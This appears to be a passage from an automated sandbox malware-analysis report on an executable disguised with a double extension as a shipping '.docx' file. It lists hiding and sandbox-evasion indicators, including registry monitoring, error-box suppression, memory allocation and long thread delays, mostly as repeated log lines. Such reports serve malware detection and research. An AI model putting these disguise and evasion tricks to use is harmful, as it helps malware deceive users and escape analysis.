                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeStatic PE information: section name: .text entropy: 7.655093124415781

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: Possible double extension: docx.scrStatic PE information: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376, type: MEMORYSTR
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeMemory allocated: 26E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeMemory allocated: 2970000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeMemory allocated: 26E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeMemory allocated: 8D90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeMemory allocated: 9D90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeMemory allocated: 9FA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeMemory allocated: AFA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeMemory allocated: B610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeMemory allocated: C610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeMemory allocated: D610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeMemory allocated: 2FE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeMemory allocated: 5180000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeThread delayed: delay time: 240000Jump to behavior
